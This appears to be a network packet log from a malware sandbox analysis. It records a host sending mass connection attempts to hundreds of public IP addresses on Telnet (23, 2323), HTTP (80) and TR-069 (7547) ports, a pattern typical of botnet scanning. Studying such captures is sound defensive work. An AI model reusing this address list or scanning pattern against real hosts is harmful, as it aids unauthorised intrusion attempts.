                                          Nov 7, 2024 11:57:58.434881926 CET228880192.168.2.13206.18.224.79
                                          Nov 7, 2024 11:57:58.434915066 CET228880192.168.2.13206.208.9.21
                                          Nov 7, 2024 11:57:58.434917927 CET228880192.168.2.13206.52.151.49
                                          Nov 7, 2024 11:57:58.434936047 CET228880192.168.2.13206.239.61.135
                                          Nov 7, 2024 11:57:58.434940100 CET228880192.168.2.13206.228.216.59
                                          Nov 7, 2024 11:57:58.434943914 CET228880192.168.2.13206.19.209.251
                                          Nov 7, 2024 11:57:58.434982061 CET228880192.168.2.13206.245.180.188
                                          Nov 7, 2024 11:57:58.434995890 CET228880192.168.2.13206.15.24.156
                                          Nov 7, 2024 11:57:58.434998035 CET228880192.168.2.13206.27.39.107
                                          Nov 7, 2024 11:57:58.435014009 CET228880192.168.2.13206.204.67.248
                                          Nov 7, 2024 11:57:58.435034990 CET228880192.168.2.13206.145.95.216
                                          Nov 7, 2024 11:57:58.435060978 CET228880192.168.2.13206.45.192.75
                                          Nov 7, 2024 11:57:58.435074091 CET228880192.168.2.13206.197.115.79
                                          Nov 7, 2024 11:57:58.435081959 CET228880192.168.2.13206.68.172.155
                                          Nov 7, 2024 11:57:58.435095072 CET228880192.168.2.13206.165.190.38
                                          Nov 7, 2024 11:57:58.435096979 CET228880192.168.2.13206.56.122.84
                                          Nov 7, 2024 11:57:58.435137033 CET228880192.168.2.13206.52.244.196
                                          Nov 7, 2024 11:57:58.435148954 CET228880192.168.2.13206.109.57.191
                                          Nov 7, 2024 11:57:58.435159922 CET228880192.168.2.13206.82.225.38
                                          Nov 7, 2024 11:57:58.435173035 CET228880192.168.2.13206.35.76.126
                                          Nov 7, 2024 11:57:58.435173035 CET228880192.168.2.13206.212.100.192
                                          Nov 7, 2024 11:57:58.435177088 CET228880192.168.2.13206.230.45.171
                                          Nov 7, 2024 11:57:58.435183048 CET228880192.168.2.13206.153.196.245
                                          Nov 7, 2024 11:57:58.435214043 CET228880192.168.2.13206.165.129.31
                                          Nov 7, 2024 11:57:58.435218096 CET228880192.168.2.13206.71.192.234
                                          Nov 7, 2024 11:57:58.435237885 CET228880192.168.2.13206.35.86.211
                                          Nov 7, 2024 11:57:58.435240030 CET228880192.168.2.13206.13.225.210
                                          Nov 7, 2024 11:57:58.435240030 CET228880192.168.2.13206.196.244.15
                                          Nov 7, 2024 11:57:58.435256958 CET228880192.168.2.13206.100.201.116
                                          Nov 7, 2024 11:57:58.435296059 CET228880192.168.2.13206.66.123.59
                                          Nov 7, 2024 11:57:58.435297012 CET228880192.168.2.13206.198.160.74
                                          Nov 7, 2024 11:57:58.435311079 CET228880192.168.2.13206.171.226.126
                                          Nov 7, 2024 11:57:58.435324907 CET228880192.168.2.13206.13.16.226
                                          Nov 7, 2024 11:57:58.435336113 CET228880192.168.2.13206.32.38.121
                                          Nov 7, 2024 11:57:58.435359001 CET228880192.168.2.13206.110.213.255
                                          Nov 7, 2024 11:57:58.435368061 CET228880192.168.2.13206.178.248.32
                                          Nov 7, 2024 11:57:58.435381889 CET228880192.168.2.13206.235.105.178
                                          Nov 7, 2024 11:57:58.435395956 CET228880192.168.2.13206.131.175.96
                                          Nov 7, 2024 11:57:58.435425043 CET228880192.168.2.13206.58.171.243
                                          Nov 7, 2024 11:57:58.435430050 CET228880192.168.2.13206.116.102.162
                                          Nov 7, 2024 11:57:58.435441017 CET228880192.168.2.13206.224.114.194
                                          Nov 7, 2024 11:57:58.435446978 CET228880192.168.2.13206.34.60.107
                                          Nov 7, 2024 11:57:58.435466051 CET228880192.168.2.13206.8.168.56
                                          Nov 7, 2024 11:57:58.435492992 CET228880192.168.2.13206.66.17.63
                                          Nov 7, 2024 11:57:58.435514927 CET228880192.168.2.13206.105.253.212
                                          Nov 7, 2024 11:57:58.435514927 CET228880192.168.2.13206.148.28.13
                                          Nov 7, 2024 11:57:58.435514927 CET228880192.168.2.13206.170.101.118
                                          Nov 7, 2024 11:57:58.435528994 CET228880192.168.2.13206.100.132.55
                                          Nov 7, 2024 11:57:58.435537100 CET228880192.168.2.13206.40.110.60
                                          Nov 7, 2024 11:57:58.435548067 CET228880192.168.2.13206.199.166.73
                                          Nov 7, 2024 11:57:58.435595036 CET228880192.168.2.13206.129.222.186
                                          Nov 7, 2024 11:57:58.435599089 CET228880192.168.2.13206.85.71.240
                                          Nov 7, 2024 11:57:58.435605049 CET228880192.168.2.13206.178.226.19
                                          Nov 7, 2024 11:57:58.435605049 CET228880192.168.2.13206.218.152.166
                                          Nov 7, 2024 11:57:58.435616016 CET228880192.168.2.13206.46.191.6
                                          Nov 7, 2024 11:57:58.435630083 CET228880192.168.2.13206.180.255.131
                                          Nov 7, 2024 11:57:58.435631990 CET228880192.168.2.13206.45.35.86
                                          Nov 7, 2024 11:57:58.440278053 CET802288206.13.16.226192.168.2.13
                                          Nov 7, 2024 11:57:58.440330029 CET228880192.168.2.13206.13.16.226
                                          Nov 7, 2024 11:57:59.387533903 CET33122323192.168.2.13100.253.20.57
                                          Nov 7, 2024 11:57:59.387558937 CET331223192.168.2.13152.34.154.52
                                          Nov 7, 2024 11:57:59.387558937 CET331223192.168.2.1347.131.107.233
                                          Nov 7, 2024 11:57:59.387573004 CET33122323192.168.2.13205.203.130.70
                                          Nov 7, 2024 11:57:59.387577057 CET331223192.168.2.1398.23.153.97
                                          Nov 7, 2024 11:57:59.387577057 CET331223192.168.2.13187.153.191.132
                                          Nov 7, 2024 11:57:59.387577057 CET331223192.168.2.1373.20.241.104
                                          Nov 7, 2024 11:57:59.387593031 CET331223192.168.2.13125.69.107.138
                                          Nov 7, 2024 11:57:59.387592077 CET331223192.168.2.13173.213.25.70
                                          Nov 7, 2024 11:57:59.387593985 CET331223192.168.2.1381.90.32.31
                                          Nov 7, 2024 11:57:59.387595892 CET331223192.168.2.1380.174.252.138
                                          Nov 7, 2024 11:57:59.387592077 CET331223192.168.2.13138.84.34.126
                                          Nov 7, 2024 11:57:59.387595892 CET331223192.168.2.1397.134.10.94
                                          Nov 7, 2024 11:57:59.387592077 CET331223192.168.2.13145.217.171.157
                                          Nov 7, 2024 11:57:59.387595892 CET331223192.168.2.13148.231.251.28
                                          Nov 7, 2024 11:57:59.387620926 CET331223192.168.2.13161.186.122.92
                                          Nov 7, 2024 11:57:59.387620926 CET331223192.168.2.1396.213.99.53
                                          Nov 7, 2024 11:57:59.387620926 CET331223192.168.2.13144.191.238.21
                                          Nov 7, 2024 11:57:59.387622118 CET331223192.168.2.13141.197.242.103
                                          Nov 7, 2024 11:57:59.387620926 CET33122323192.168.2.13108.141.165.179
                                          Nov 7, 2024 11:57:59.387622118 CET331223192.168.2.13213.75.48.174
                                          Nov 7, 2024 11:57:59.387620926 CET331223192.168.2.13132.218.134.167
                                          Nov 7, 2024 11:57:59.387622118 CET331223192.168.2.13129.119.57.222
                                          Nov 7, 2024 11:57:59.387620926 CET331223192.168.2.13122.154.170.215
                                          Nov 7, 2024 11:57:59.387622118 CET331223192.168.2.13146.220.207.46
                                          Nov 7, 2024 11:57:59.387620926 CET331223192.168.2.13155.171.28.238
                                          Nov 7, 2024 11:57:59.387622118 CET331223192.168.2.1389.230.194.39
                                          Nov 7, 2024 11:57:59.387620926 CET331223192.168.2.13189.31.251.3
                                          Nov 7, 2024 11:57:59.387620926 CET33122323192.168.2.13125.181.17.33
                                          Nov 7, 2024 11:57:59.387631893 CET331223192.168.2.13150.141.255.44
                                          Nov 7, 2024 11:57:59.387629986 CET331223192.168.2.139.187.193.218
                                          Nov 7, 2024 11:57:59.387629986 CET331223192.168.2.13155.229.191.136
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.13102.132.189.71
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.13108.214.80.231
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.1371.205.20.97
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.1376.177.247.21
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.13193.169.27.197
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.13137.197.174.188
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.13154.108.216.182
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.13115.47.144.218
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.1341.85.32.86
                                          Nov 7, 2024 11:57:59.387650013 CET331223192.168.2.135.152.43.85
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.1389.25.4.248
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.1381.137.96.73
                                          Nov 7, 2024 11:57:59.387650013 CET331223192.168.2.1383.250.69.30
                                          Nov 7, 2024 11:57:59.387648106 CET331223192.168.2.13204.234.43.204
                                          Nov 7, 2024 11:57:59.387643099 CET33122323192.168.2.1371.106.215.185
                                          Nov 7, 2024 11:57:59.387650013 CET331223192.168.2.1396.169.164.205
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.1381.192.103.135
                                          Nov 7, 2024 11:57:59.387648106 CET331223192.168.2.13162.12.58.82
                                          Nov 7, 2024 11:57:59.387643099 CET331223192.168.2.13212.92.95.42
                                          Nov 7, 2024 11:57:59.387648106 CET331223192.168.2.13125.151.240.216
                                          Nov 7, 2024 11:57:59.387648106 CET331223192.168.2.13172.103.205.253
                                          Nov 7, 2024 11:57:59.387648106 CET331223192.168.2.13136.126.137.204
                                          Nov 7, 2024 11:57:59.387660027 CET331223192.168.2.13155.138.168.74
                                          Nov 7, 2024 11:57:59.387660027 CET331223192.168.2.1354.29.154.30
                                          Nov 7, 2024 11:57:59.387660027 CET331223192.168.2.13111.195.147.193
                                          Nov 7, 2024 11:57:59.387660980 CET331223192.168.2.13105.66.250.77
                                          Nov 7, 2024 11:57:59.387664080 CET331223192.168.2.1396.123.209.80
                                          Nov 7, 2024 11:57:59.387664080 CET331223192.168.2.13211.154.151.25
                                          Nov 7, 2024 11:57:59.387664080 CET331223192.168.2.1331.24.0.171
                                          Nov 7, 2024 11:57:59.387664080 CET33122323192.168.2.13209.69.174.152
                                          Nov 7, 2024 11:57:59.387664080 CET331223192.168.2.13201.189.103.92
                                          Nov 7, 2024 11:57:59.387665033 CET331223192.168.2.13209.38.169.190
                                          Nov 7, 2024 11:57:59.387665033 CET331223192.168.2.1365.21.180.134
                                          Nov 7, 2024 11:57:59.387665033 CET331223192.168.2.1391.125.127.164
                                          Nov 7, 2024 11:57:59.387667894 CET33122323192.168.2.13111.157.139.113
                                          Nov 7, 2024 11:57:59.387667894 CET331223192.168.2.1336.217.213.80
                                          Nov 7, 2024 11:57:59.387667894 CET331223192.168.2.1349.145.15.60
                                          Nov 7, 2024 11:57:59.387667894 CET331223192.168.2.13108.97.218.58
                                          Nov 7, 2024 11:57:59.387672901 CET331223192.168.2.13179.96.128.90
                                          Nov 7, 2024 11:57:59.387672901 CET331223192.168.2.13130.61.228.56
                                          Nov 7, 2024 11:57:59.387710094 CET331223192.168.2.1332.74.34.211
                                          Nov 7, 2024 11:57:59.387710094 CET331223192.168.2.1364.21.69.253
                                          Nov 7, 2024 11:57:59.387711048 CET331223192.168.2.13194.183.189.139
                                          Nov 7, 2024 11:57:59.387711048 CET331223192.168.2.13123.106.98.189
                                          Nov 7, 2024 11:57:59.387711048 CET331223192.168.2.13139.177.54.137
                                          Nov 7, 2024 11:57:59.387712002 CET331223192.168.2.13222.222.239.149
                                          Nov 7, 2024 11:57:59.387711048 CET331223192.168.2.13186.54.65.205
                                          Nov 7, 2024 11:57:59.387712002 CET33122323192.168.2.13163.126.157.42
                                          Nov 7, 2024 11:57:59.387712002 CET331223192.168.2.13125.74.241.195
                                          Nov 7, 2024 11:57:59.387712002 CET331223192.168.2.1342.142.92.199
                                          Nov 7, 2024 11:57:59.387716055 CET331223192.168.2.134.217.222.109
                                          Nov 7, 2024 11:57:59.387712002 CET331223192.168.2.13209.27.192.152
                                          Nov 7, 2024 11:57:59.387716055 CET331223192.168.2.1393.41.60.41
                                          Nov 7, 2024 11:57:59.387712002 CET331223192.168.2.13204.182.219.217
                                          Nov 7, 2024 11:57:59.387716055 CET331223192.168.2.13204.41.19.169
                                          Nov 7, 2024 11:57:59.387716055 CET331223192.168.2.13100.26.158.247
                                          Nov 7, 2024 11:57:59.387729883 CET331223192.168.2.13117.34.143.192
                                          Nov 7, 2024 11:57:59.387729883 CET331223192.168.2.13169.235.185.187
                                          Nov 7, 2024 11:57:59.387729883 CET331223192.168.2.13114.21.228.38
                                          Nov 7, 2024 11:57:59.387743950 CET331223192.168.2.1359.41.174.228
                                          Nov 7, 2024 11:57:59.387743950 CET33122323192.168.2.1372.224.94.51
                                          Nov 7, 2024 11:57:59.387743950 CET331223192.168.2.1335.65.132.192
                                          Nov 7, 2024 11:57:59.387744904 CET331223192.168.2.13125.132.67.50
                                          Nov 7, 2024 11:57:59.387744904 CET331223192.168.2.13110.14.188.209
                                          Nov 7, 2024 11:57:59.387744904 CET331223192.168.2.13103.53.70.251
                                          Nov 7, 2024 11:57:59.387763023 CET331223192.168.2.1325.10.26.37
                                          Nov 7, 2024 11:57:59.387763023 CET331223192.168.2.13216.66.10.43
                                          Nov 7, 2024 11:57:59.387763023 CET331223192.168.2.13125.247.1.37
                                          Nov 7, 2024 11:57:59.387763023 CET331223192.168.2.1393.67.3.124
                                          Nov 7, 2024 11:57:59.387763023 CET331223192.168.2.13197.51.8.193
                                          Nov 7, 2024 11:57:59.387763023 CET33122323192.168.2.1312.166.100.127
                                          Nov 7, 2024 11:57:59.387763023 CET331223192.168.2.13111.174.154.35
                                          Nov 7, 2024 11:57:59.387763023 CET331223192.168.2.1349.56.32.211
                                          Nov 7, 2024 11:57:59.387763023 CET331223192.168.2.1377.78.41.182
                                          Nov 7, 2024 11:57:59.387768030 CET331223192.168.2.13140.76.60.208
                                          Nov 7, 2024 11:57:59.387768030 CET33122323192.168.2.1397.0.229.39
                                          Nov 7, 2024 11:57:59.387768030 CET331223192.168.2.1348.91.165.199
                                          Nov 7, 2024 11:57:59.387770891 CET331223192.168.2.139.32.15.159
                                          Nov 7, 2024 11:57:59.387770891 CET331223192.168.2.13206.180.196.137
                                          Nov 7, 2024 11:57:59.387770891 CET331223192.168.2.13144.44.38.42
                                          Nov 7, 2024 11:57:59.387770891 CET331223192.168.2.13128.212.248.242
                                          Nov 7, 2024 11:57:59.387770891 CET331223192.168.2.13157.85.191.85
                                          Nov 7, 2024 11:57:59.387773991 CET331223192.168.2.1317.70.100.21
                                          Nov 7, 2024 11:57:59.387770891 CET33122323192.168.2.1397.90.202.29
                                          Nov 7, 2024 11:57:59.387778044 CET331223192.168.2.1386.75.159.145
                                          Nov 7, 2024 11:57:59.387784958 CET331223192.168.2.13203.110.215.183
                                          Nov 7, 2024 11:57:59.387784958 CET331223192.168.2.13169.185.199.170
                                          Nov 7, 2024 11:57:59.387792110 CET331223192.168.2.13198.107.40.202
                                          Nov 7, 2024 11:57:59.387798071 CET331223192.168.2.1391.96.207.235
                                          Nov 7, 2024 11:57:59.387798071 CET331223192.168.2.13136.206.184.76
                                          Nov 7, 2024 11:57:59.387800932 CET331223192.168.2.13188.125.36.155
                                          Nov 7, 2024 11:57:59.387801886 CET331223192.168.2.13218.161.48.149
                                          Nov 7, 2024 11:57:59.387801886 CET331223192.168.2.13135.228.164.55
                                          Nov 7, 2024 11:57:59.387804985 CET33122323192.168.2.13185.208.164.129
                                          Nov 7, 2024 11:57:59.387804985 CET331223192.168.2.13132.137.230.211
                                          Nov 7, 2024 11:57:59.387809992 CET331223192.168.2.1390.246.106.175
                                          Nov 7, 2024 11:57:59.387818098 CET331223192.168.2.13101.76.54.43
                                          Nov 7, 2024 11:57:59.387821913 CET331223192.168.2.13190.35.246.38
                                          Nov 7, 2024 11:57:59.387831926 CET331223192.168.2.1346.177.128.102
                                          Nov 7, 2024 11:57:59.387837887 CET331223192.168.2.13204.67.238.42
                                          Nov 7, 2024 11:57:59.387836933 CET33122323192.168.2.13197.78.72.4
                                          Nov 7, 2024 11:57:59.387839079 CET331223192.168.2.1393.166.213.226
                                          Nov 7, 2024 11:57:59.387846947 CET331223192.168.2.1395.14.205.70
                                          Nov 7, 2024 11:57:59.387855053 CET331223192.168.2.1338.82.99.109
                                          Nov 7, 2024 11:57:59.387861013 CET331223192.168.2.1393.14.165.195
                                          Nov 7, 2024 11:57:59.387861013 CET331223192.168.2.13181.30.46.154
                                          Nov 7, 2024 11:57:59.387861967 CET331223192.168.2.134.114.158.103
                                          Nov 7, 2024 11:57:59.387861967 CET331223192.168.2.1313.147.103.141
                                          Nov 7, 2024 11:57:59.387865067 CET331223192.168.2.13201.4.167.91
                                          Nov 7, 2024 11:57:59.387867928 CET33122323192.168.2.13194.216.168.144
                                          Nov 7, 2024 11:57:59.387867928 CET331223192.168.2.13112.197.1.193
                                          Nov 7, 2024 11:57:59.387872934 CET331223192.168.2.13106.118.225.124
                                          Nov 7, 2024 11:57:59.387872934 CET331223192.168.2.1341.69.107.177
                                          Nov 7, 2024 11:57:59.387876034 CET331223192.168.2.13210.83.187.173
                                          Nov 7, 2024 11:57:59.387886047 CET331223192.168.2.1381.176.143.214
                                          Nov 7, 2024 11:57:59.387886047 CET331223192.168.2.13166.30.5.9
                                          Nov 7, 2024 11:57:59.387891054 CET331223192.168.2.13145.13.24.85
                                          Nov 7, 2024 11:57:59.387891054 CET331223192.168.2.13190.63.198.90
                                          Nov 7, 2024 11:57:59.387891054 CET331223192.168.2.1352.82.131.90
                                          Nov 7, 2024 11:57:59.387897968 CET331223192.168.2.13208.233.4.155
                                          Nov 7, 2024 11:57:59.387898922 CET33122323192.168.2.1391.139.185.210
                                          Nov 7, 2024 11:57:59.387898922 CET331223192.168.2.13110.85.247.104
                                          Nov 7, 2024 11:57:59.387909889 CET331223192.168.2.1396.94.3.6
                                          Nov 7, 2024 11:57:59.387912035 CET331223192.168.2.13116.114.165.233
                                          Nov 7, 2024 11:57:59.387912035 CET331223192.168.2.13106.244.165.66
                                          Nov 7, 2024 11:57:59.387912035 CET331223192.168.2.13159.22.162.211
                                          Nov 7, 2024 11:57:59.387917042 CET331223192.168.2.1392.7.47.238
                                          Nov 7, 2024 11:57:59.387917042 CET331223192.168.2.1368.235.213.127
                                          Nov 7, 2024 11:57:59.388551950 CET575242323192.168.2.13144.38.180.55
                                          Nov 7, 2024 11:57:59.389658928 CET4110223192.168.2.1390.214.208.149
                                          Nov 7, 2024 11:57:59.390733957 CET4829023192.168.2.13198.227.183.55
                                          Nov 7, 2024 11:57:59.391731977 CET4345823192.168.2.1312.155.172.52
                                          Nov 7, 2024 11:57:59.392657042 CET23233312100.253.20.57192.168.2.13
                                          Nov 7, 2024 11:57:59.392673969 CET233312125.69.107.138192.168.2.13
                                          Nov 7, 2024 11:57:59.392684937 CET233312152.34.154.52192.168.2.13
                                          Nov 7, 2024 11:57:59.392693043 CET23331298.23.153.97192.168.2.13
                                          Nov 7, 2024 11:57:59.392703056 CET233312187.153.191.132192.168.2.13
                                          Nov 7, 2024 11:57:59.392718077 CET33122323192.168.2.13100.253.20.57
                                          Nov 7, 2024 11:57:59.392718077 CET331223192.168.2.13125.69.107.138
                                          Nov 7, 2024 11:57:59.392731905 CET331223192.168.2.13152.34.154.52
                                          Nov 7, 2024 11:57:59.392756939 CET331223192.168.2.1398.23.153.97
                                          Nov 7, 2024 11:57:59.392756939 CET331223192.168.2.13187.153.191.132
                                          Nov 7, 2024 11:57:59.392931938 CET5179223192.168.2.13154.239.175.19
                                          Nov 7, 2024 11:57:59.393074989 CET23233312205.203.130.70192.168.2.13
                                          Nov 7, 2024 11:57:59.393122911 CET33122323192.168.2.13205.203.130.70
                                          Nov 7, 2024 11:57:59.393208981 CET23331273.20.241.104192.168.2.13
                                          Nov 7, 2024 11:57:59.393220901 CET23331247.131.107.233192.168.2.13
                                          Nov 7, 2024 11:57:59.393232107 CET23331281.90.32.31192.168.2.13
                                          Nov 7, 2024 11:57:59.393241882 CET23331280.174.252.138192.168.2.13
                                          Nov 7, 2024 11:57:59.393250942 CET233312173.213.25.70192.168.2.13
                                          Nov 7, 2024 11:57:59.393258095 CET331223192.168.2.1373.20.241.104
                                          Nov 7, 2024 11:57:59.393260002 CET331223192.168.2.1347.131.107.233
                                          Nov 7, 2024 11:57:59.393261909 CET331223192.168.2.1381.90.32.31
                                          Nov 7, 2024 11:57:59.393261909 CET23331297.134.10.94192.168.2.13
                                          Nov 7, 2024 11:57:59.393274069 CET233312148.231.251.28192.168.2.13
                                          Nov 7, 2024 11:57:59.393284082 CET233312213.75.48.174192.168.2.13
                                          Nov 7, 2024 11:57:59.393299103 CET331223192.168.2.13173.213.25.70
                                          Nov 7, 2024 11:57:59.393301010 CET331223192.168.2.1380.174.252.138
                                          Nov 7, 2024 11:57:59.393301010 CET233312161.186.122.92192.168.2.13
                                          Nov 7, 2024 11:57:59.393301010 CET331223192.168.2.1397.134.10.94
                                          Nov 7, 2024 11:57:59.393301010 CET331223192.168.2.13148.231.251.28
                                          Nov 7, 2024 11:57:59.393311977 CET233312138.84.34.126192.168.2.13
                                          Nov 7, 2024 11:57:59.393321991 CET233312150.141.255.44192.168.2.13
                                          Nov 7, 2024 11:57:59.393330097 CET331223192.168.2.13213.75.48.174
                                          Nov 7, 2024 11:57:59.393332005 CET233312144.191.238.21192.168.2.13
                                          Nov 7, 2024 11:57:59.393337965 CET331223192.168.2.13161.186.122.92
                                          Nov 7, 2024 11:57:59.393343925 CET233312145.217.171.157192.168.2.13
                                          Nov 7, 2024 11:57:59.393347979 CET331223192.168.2.13138.84.34.126
                                          Nov 7, 2024 11:57:59.393353939 CET233312132.218.134.167192.168.2.13
                                          Nov 7, 2024 11:57:59.393358946 CET331223192.168.2.13150.141.255.44
                                          Nov 7, 2024 11:57:59.393362999 CET233312141.197.242.103192.168.2.13
                                          Nov 7, 2024 11:57:59.393373013 CET331223192.168.2.13144.191.238.21
                                          Nov 7, 2024 11:57:59.393373013 CET331223192.168.2.13145.217.171.157
                                          Nov 7, 2024 11:57:59.393374920 CET23331296.213.99.53192.168.2.13
                                          Nov 7, 2024 11:57:59.393384933 CET23233312108.141.165.179192.168.2.13
                                          Nov 7, 2024 11:57:59.393394947 CET331223192.168.2.13141.197.242.103
                                          Nov 7, 2024 11:57:59.393398046 CET331223192.168.2.13132.218.134.167
                                          Nov 7, 2024 11:57:59.393402100 CET233312129.119.57.222192.168.2.13
                                          Nov 7, 2024 11:57:59.393409967 CET331223192.168.2.1396.213.99.53
                                          Nov 7, 2024 11:57:59.393412113 CET233312122.154.170.215192.168.2.13
                                          Nov 7, 2024 11:57:59.393423080 CET233312146.220.207.46192.168.2.13
                                          Nov 7, 2024 11:57:59.393428087 CET33122323192.168.2.13108.141.165.179
                                          Nov 7, 2024 11:57:59.393430948 CET331223192.168.2.13129.119.57.222
                                          Nov 7, 2024 11:57:59.393433094 CET233312155.171.28.238192.168.2.13
                                          Nov 7, 2024 11:57:59.393449068 CET30567547192.168.2.1357.174.18.173
                                          Nov 7, 2024 11:57:59.393449068 CET30567547192.168.2.13202.153.207.53
                                          Nov 7, 2024 11:57:59.393464088 CET331223192.168.2.13146.220.207.46
                                          Nov 7, 2024 11:57:59.393465996 CET30567547192.168.2.13203.223.129.190
                                          Nov 7, 2024 11:57:59.393465996 CET30567547192.168.2.13190.252.174.157
                                          Nov 7, 2024 11:57:59.393465996 CET30567547192.168.2.13144.237.63.239
                                          Nov 7, 2024 11:57:59.393469095 CET331223192.168.2.13122.154.170.215
                                          Nov 7, 2024 11:57:59.393469095 CET331223192.168.2.13155.171.28.238
                                          Nov 7, 2024 11:57:59.393471956 CET30567547192.168.2.1312.64.253.6
                                          Nov 7, 2024 11:57:59.393476963 CET30567547192.168.2.135.249.50.125
                                          Nov 7, 2024 11:57:59.393476963 CET30567547192.168.2.13204.174.194.30
                                          Nov 7, 2024 11:57:59.393476963 CET30567547192.168.2.1353.86.238.36
                                          Nov 7, 2024 11:57:59.393486977 CET30567547192.168.2.13195.155.195.219
                                          Nov 7, 2024 11:57:59.393486977 CET30567547192.168.2.1318.196.29.167
                                          Nov 7, 2024 11:57:59.393486977 CET30567547192.168.2.1363.153.17.10
                                          Nov 7, 2024 11:57:59.393490076 CET30567547192.168.2.13140.171.114.93
                                          Nov 7, 2024 11:57:59.393490076 CET30567547192.168.2.1381.203.88.51
                                          Nov 7, 2024 11:57:59.393490076 CET30567547192.168.2.1344.27.29.77
                                          Nov 7, 2024 11:57:59.393491030 CET30567547192.168.2.13105.5.46.21
                                          Nov 7, 2024 11:57:59.393491983 CET30567547192.168.2.1354.177.65.193
                                          Nov 7, 2024 11:57:59.393491983 CET30567547192.168.2.13216.160.35.193
                                          Nov 7, 2024 11:57:59.393491983 CET30567547192.168.2.13220.243.124.124
                                          Nov 7, 2024 11:57:59.393495083 CET30567547192.168.2.13151.65.161.82
                                          Nov 7, 2024 11:57:59.393495083 CET30567547192.168.2.1318.34.97.168
                                          Nov 7, 2024 11:57:59.393496037 CET30567547192.168.2.13124.148.239.68
                                          Nov 7, 2024 11:57:59.393496037 CET30567547192.168.2.13179.155.22.35
                                          Nov 7, 2024 11:57:59.393496037 CET30567547192.168.2.1390.202.136.213
                                          Nov 7, 2024 11:57:59.393496037 CET30567547192.168.2.1332.141.65.185
                                          Nov 7, 2024 11:57:59.393507957 CET30567547192.168.2.13144.212.179.33
                                          Nov 7, 2024 11:57:59.393508911 CET30567547192.168.2.1318.194.23.225
                                          Nov 7, 2024 11:57:59.393512964 CET30567547192.168.2.1320.30.92.20
                                          Nov 7, 2024 11:57:59.393512964 CET30567547192.168.2.1364.95.177.146
                                          Nov 7, 2024 11:57:59.393512964 CET30567547192.168.2.139.113.150.188
                                          Nov 7, 2024 11:57:59.393516064 CET30567547192.168.2.1349.120.24.5
                                          Nov 7, 2024 11:57:59.393516064 CET30567547192.168.2.13151.123.235.17
                                          Nov 7, 2024 11:57:59.393516064 CET30567547192.168.2.13201.212.243.73
                                          Nov 7, 2024 11:57:59.393529892 CET30567547192.168.2.13221.217.45.74
                                          Nov 7, 2024 11:57:59.393531084 CET30567547192.168.2.1324.21.85.45
                                          Nov 7, 2024 11:57:59.393531084 CET30567547192.168.2.13132.116.53.90
                                          Nov 7, 2024 11:57:59.393532991 CET30567547192.168.2.13179.245.87.199
                                          Nov 7, 2024 11:57:59.393532991 CET30567547192.168.2.1363.21.9.52
                                          Nov 7, 2024 11:57:59.393532991 CET30567547192.168.2.13156.101.115.38
                                          Nov 7, 2024 11:57:59.393536091 CET30567547192.168.2.13146.174.171.155
                                          Nov 7, 2024 11:57:59.393536091 CET30567547192.168.2.13121.40.14.186
                                          Nov 7, 2024 11:57:59.393536091 CET30567547192.168.2.13138.178.66.165
                                          Nov 7, 2024 11:57:59.393537998 CET30567547192.168.2.13158.29.118.64
                                          Nov 7, 2024 11:57:59.393537998 CET30567547192.168.2.13179.126.197.63
                                          Nov 7, 2024 11:57:59.393538952 CET30567547192.168.2.134.33.6.64
                                          Nov 7, 2024 11:57:59.393537998 CET30567547192.168.2.1382.250.90.193
                                          Nov 7, 2024 11:57:59.393541098 CET30567547192.168.2.13202.127.65.106
                                          Nov 7, 2024 11:57:59.393538952 CET30567547192.168.2.1346.202.127.227
                                          Nov 7, 2024 11:57:59.393541098 CET30567547192.168.2.13223.133.160.185
                                          Nov 7, 2024 11:57:59.393537998 CET30567547192.168.2.1362.57.121.36
                                          Nov 7, 2024 11:57:59.393548965 CET30567547192.168.2.13198.57.165.209
                                          Nov 7, 2024 11:57:59.393548965 CET30567547192.168.2.13150.190.13.131
                                          Nov 7, 2024 11:57:59.393558979 CET30567547192.168.2.13191.224.125.104
                                          Nov 7, 2024 11:57:59.393565893 CET30567547192.168.2.1393.112.45.31
                                          Nov 7, 2024 11:57:59.393565893 CET30567547192.168.2.1383.174.116.61
                                          Nov 7, 2024 11:57:59.393579960 CET30567547192.168.2.13157.221.54.55
                                          Nov 7, 2024 11:57:59.393584967 CET30567547192.168.2.13210.92.4.78
                                          Nov 7, 2024 11:57:59.393589973 CET30567547192.168.2.13139.249.109.119
                                          Nov 7, 2024 11:57:59.393589973 CET30567547192.168.2.1313.58.103.197
                                          Nov 7, 2024 11:57:59.393591881 CET30567547192.168.2.13114.128.191.57
                                          Nov 7, 2024 11:57:59.393593073 CET30567547192.168.2.1391.59.23.136
                                          Nov 7, 2024 11:57:59.393594027 CET30567547192.168.2.1388.102.208.219
                                          Nov 7, 2024 11:57:59.393610954 CET30567547192.168.2.13159.199.194.10
                                          Nov 7, 2024 11:57:59.393611908 CET30567547192.168.2.13185.74.157.2
                                          Nov 7, 2024 11:57:59.393615007 CET30567547192.168.2.13171.131.254.169
                                          Nov 7, 2024 11:57:59.393625975 CET30567547192.168.2.1353.249.156.121
                                          Nov 7, 2024 11:57:59.393630981 CET30567547192.168.2.13155.157.70.147
                                          Nov 7, 2024 11:57:59.393635988 CET30567547192.168.2.13168.176.198.153
                                          Nov 7, 2024 11:57:59.393637896 CET30567547192.168.2.1360.91.217.53
                                          Nov 7, 2024 11:57:59.393642902 CET30567547192.168.2.13205.149.240.243
                                          Nov 7, 2024 11:57:59.393642902 CET30567547192.168.2.13110.175.217.59
                                          Nov 7, 2024 11:57:59.393650055 CET30567547192.168.2.1365.179.199.232
                                          Nov 7, 2024 11:57:59.393651962 CET30567547192.168.2.13165.3.42.82
                                          Nov 7, 2024 11:57:59.393661976 CET30567547192.168.2.1383.136.113.136
                                          Nov 7, 2024 11:57:59.393663883 CET30567547192.168.2.13111.241.34.234
                                          Nov 7, 2024 11:57:59.393670082 CET30567547192.168.2.1313.128.183.217
